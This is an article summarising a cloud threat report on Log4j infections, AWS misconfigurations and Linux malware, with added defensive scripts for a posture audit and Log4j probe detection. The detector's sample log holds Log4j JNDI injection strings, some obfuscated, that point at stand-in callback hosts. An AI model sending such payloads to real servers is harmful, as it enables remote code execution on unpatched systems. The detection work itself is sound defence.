New data suggests that 31 percent of confirmed malware infections used Log4j as the initial infection vector, as revealed in the Cloud Threat Report. This third iteration of the report analyses four key areas of cloud security. Such is the concern over cybersecurity issues that the White House has recently issued a warning to the business community.
The report contains findings from a six-month review period. Its core message is that threat actors are broadening the scope of their efforts to gain illicit access to cloud data and resources.
The report's four main areas are:
Cloud Security Posture
The report shows that insecure configurations are on the rise: 72 percent of environments reviewed in the last six months contained them, with the most common risks found in the AWS services IAM, S3 and EC2.
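The report does not publish the individual misconfiguration checks it applied, but the three services it names (IAM, S3 and EC2) map to a small set of well-known posture rules. The script below is an added example, not code from the report or from Lacework: it runs those rules over a constructed snapshot of account configuration. The snapshot shape (`iam_users`, `s3_buckets`, `security_groups`) and the thresholds are assumptions made for this example and are not the AWS API's own response format.

```python
"""
Static cloud-posture check over a constructed snapshot of IAM, S3 and EC2
configuration. The snapshot format and thresholds are assumptions for this
example; in practice the data would be pulled from the AWS APIs first.
"""
from datetime import datetime, timezone
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (service, resource, issue)

KEY_MAX_AGE_DAYS = 90          # rotate long-lived access keys past this age
ADMIN_PORTS = {22, 3389}       # SSH / RDP should never face the whole internet
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)  # fixed clock for reproducibility

# Constructed sample snapshot: no real account, keys or hostnames.
SNAPSHOT: Dict = {
    "iam_users": [
        {"name": "alice", "console": True, "mfa": True,
         "policies": [{"Action": "s3:GetObject", "Resource": "arn:aws:s3:::logs/*"}],
         "access_keys": [{"id": "key-alice-1", "created": "2024-04-01"}]},
        {"name": "ci-bot", "console": True, "mfa": False,
         "policies": [{"Action": "*", "Resource": "*"}],
         "access_keys": [{"id": "key-ci-1", "created": "2023-01-01"}]},
    ],
    "s3_buckets": [
        {"name": "corp-backups", "public": False, "block_public_access": True, "encryption": "aws:kms"},
        {"name": "marketing-site", "public": True, "block_public_access": False, "encryption": None},
    ],
    "security_groups": [
        {"id": "sg-0a1b", "ingress": [{"port_from": 443, "port_to": 443, "cidr": "0.0.0.0/0"}]},
        {"id": "sg-0c2d", "ingress": [{"port_from": 22, "port_to": 22, "cidr": "0.0.0.0/0"},
                                      {"port_from": 0, "port_to": 65535, "cidr": "10.0.0.0/8"}]},
    ],
}


def audit_iam(users: List[Dict], now: datetime) -> List[Finding]:
    """Flag console users without MFA, wildcard admin policies and stale keys."""
    findings: List[Finding] = []
    for u in users:
        if u["console"] and not u["mfa"]:
            findings.append(("IAM", u["name"], "console access without MFA"))
        for p in u["policies"]:
            if p["Action"] == "*" and p["Resource"] == "*":
                findings.append(("IAM", u["name"], "wildcard admin policy (*:*)"))
        for k in u["access_keys"]:
            created = datetime.fromisoformat(k["created"]).replace(tzinfo=timezone.utc)
            age = (now - created).days
            if age > KEY_MAX_AGE_DAYS:
                findings.append(("IAM", u["name"], f"access key {k['id']} is {age} days old"))
    return findings


def audit_s3(buckets: List[Dict]) -> List[Finding]:
    """Flag buckets that are public, lack Block Public Access or lack encryption."""
    findings: List[Finding] = []
    for b in buckets:
        if b["public"]:
            findings.append(("S3", b["name"], "bucket ACL/policy grants public access"))
        if not b["block_public_access"]:
            findings.append(("S3", b["name"], "Block Public Access disabled"))
        if not b["encryption"]:
            findings.append(("S3", b["name"], "no default encryption"))
    return findings


def audit_security_groups(groups: List[Dict]) -> List[Finding]:
    """Flag internet-wide (0.0.0.0/0) ingress on admin ports or on all ports."""
    findings: List[Finding] = []
    for g in groups:
        for r in g["ingress"]:
            if r["cidr"] != "0.0.0.0/0":
                continue  # internal CIDRs are out of scope for this rule
            port_range = range(r["port_from"], r["port_to"] + 1)
            if r["port_from"] == 0 and r["port_to"] == 65535:
                findings.append(("EC2", g["id"], "all ports open to the internet"))
                continue
            exposed = sorted(p for p in ADMIN_PORTS if p in port_range)
            if exposed:
                findings.append(("EC2", g["id"], f"admin port(s) {exposed} open to the internet"))
    return findings


def audit(snapshot: Dict, now: datetime = NOW) -> List[Finding]:
    """Run every check and return the combined list of findings."""
    return (audit_iam(snapshot["iam_users"], now)
            + audit_s3(snapshot["s3_buckets"])
            + audit_security_groups(snapshot["security_groups"]))


if __name__ == "__main__":
    for service, resource, issue in audit(SNAPSHOT):
        print(f"[{service}] {resource}: {issue}")
```

On the constructed snapshot the checker reports seven findings, all against `ci-bot`, `marketing-site` and `sg-0c2d`; `alice`, `corp-backups` and the HTTPS-only group `sg-0a1b` pass. The 0.0.0.0/0 rule deliberately ignores port 443, since public HTTPS is usually intended; the judgement call a real posture tool has to make is which exposures are expected.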
Small businesses in particular are at risk from cloud access brokers, who sell access to cloud accounts online.
Runtime threats & Linux Malware
Aside from the malware encountered within monitored environments, the report also presents some other newly discovered threats. These threats, in particular, provide an insight into the evolving landscape of Linux-based malware.
Vulnerabilities & Software Supply Chain
With over 30 percent of confirmed malware infections using Log4j as the initial infection vector, Lacework Labs observed a flood of Log4j requests. Initially the majority of these were benign, with only a minority hostile. As time went on, however, requests from benign sources dropped off and the majority came from malicious sources.
Muhstik, the malware family most commonly observed in the wild, can incorporate vulnerabilities like Log4j into its operations within 48 hours.
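The benign-versus-hostile split described above is something a defender can reproduce from their own web server logs. The script below is an added example, not code from the report or from Lacework Labs: it parses combined-format access log lines, normalises the request, referer and user-agent fields (URL decoding and collapsing the nested-lookup tricks that hide the literal string `jndi`), extracts the callback host from any JNDI lookup it finds, and counts hits per day as "research" (callback host on an allowlist of known scanners) or "hostile" (everything else). The log lines, the scanner allowlist (`scanner.example.invalid`) and all IP addresses are constructed for this example.

```python
"""
Detect Log4j JNDI lookup probes in web access logs and summarise them per day,
split into known-research scanners and unknown (treated as hostile) sources.
All sample data below is constructed; the allowlist is an assumption.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, Optional
from urllib.parse import unquote

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>[^:]+):[^\]]+\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Nested lookups used to hide the string "jndi" from naive matching, e.g.
# ${lower:j}, ${upper:J} or ${::-j}; each resolves to a single letter.
OBFUSCATION_RE = re.compile(r'\$\{(?:lower|upper):([a-z])\}|\$\{::-([a-z])\}', re.IGNORECASE)
# A JNDI lookup: ${jndi:<scheme>://<host>...}
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)', re.IGNORECASE)

# Constructed allowlist of callback hosts belonging to known research scanners.
KNOWN_RESEARCH_HOSTS = {"scanner.example.invalid"}

# Constructed sample log (RFC 5737 documentation addresses, .invalid hostnames).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=${jndi:ldap://scanner.example.invalid/probe} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:15:10:00 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:dns://scanner.example.invalid/probe}"
198.51.100.7 - - [10/Dec/2021:23:59:59 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:ldap://198.51.100.7:1389/a}"
198.51.100.7 - - [11/Dec/2021:09:30:02 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"
198.51.100.8 - - [11/Dec/2021:09:31:00 +0000] "GET /status HTTP/1.1" 200 12 "${${::-j}ndi:rmi://198.51.100.8/c}" "Mozilla/5.0"
192.0.2.55 - - [11/Dec/2021:10:00:00 +0000] "GET /status HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""


def normalise(text: str) -> str:
    """Undo up to two layers of URL encoding, collapse nested lookups, lowercase."""
    text = unquote(unquote(text))
    prev = None
    while prev != text:  # repeat until no obfuscation pattern remains
        prev = text
        text = OBFUSCATION_RE.sub(lambda m: m.group(1) or m.group(2), text)
    return text.lower()


def find_jndi(line: str) -> Optional[Dict[str, str]]:
    """Return details of a JNDI lookup in the request, referer or UA, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than guess
    for field in (m["req"], m["ref"], m["ua"]):
        hit = JNDI_RE.search(normalise(field))
        if hit:
            host = hit["host"]
            cls = "research" if host in KNOWN_RESEARCH_HOSTS else "hostile"
            return {"ip": m["ip"], "day": m["day"], "scheme": hit["scheme"],
                    "host": host, "class": cls}
    return None


def summarise(lines: Iterable[str]) -> Dict[str, Dict[str, int]]:
    """Count research vs hostile JNDI probes per calendar day."""
    per_day: Dict[str, Counter] = defaultdict(Counter)
    for line in lines:
        hit = find_jndi(line)
        if hit:
            per_day[hit["day"]][hit["class"]] += 1
    return {day: dict(counts) for day, counts in per_day.items()}


if __name__ == "__main__":
    for day, counts in summarise(SAMPLE_LOG.splitlines()).items():
        print(day, counts)
```

On the constructed log the first day shows two research probes and one hostile one, and the second day only hostile probes, which is the shift the report describes. Matching only the literal `${jndi:` would miss two of the three hostile lines here (one URL-encoded, two using nested lookups), so the normalisation step is the part worth keeping if you adapt this to your own logs.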
Too many organisations were found to have compliance violations within their cloud infrastructure, opening the door for attackers to gain initial access, escalate privileges, and impact protected data.
For example, over the past six months, XMRig, Muhstik, and Mirai dominated the environment, accounting for a combined 74 percent of the malicious installations Lacework observed.
Proactive Defence & Intelligence
Though attackers are rapidly becoming more sophisticated in their cloud operations, the report finds some positives. The better news is that defenders have plenty of tools with which to fight back, including canary tokens, honeypots and application sandboxing.
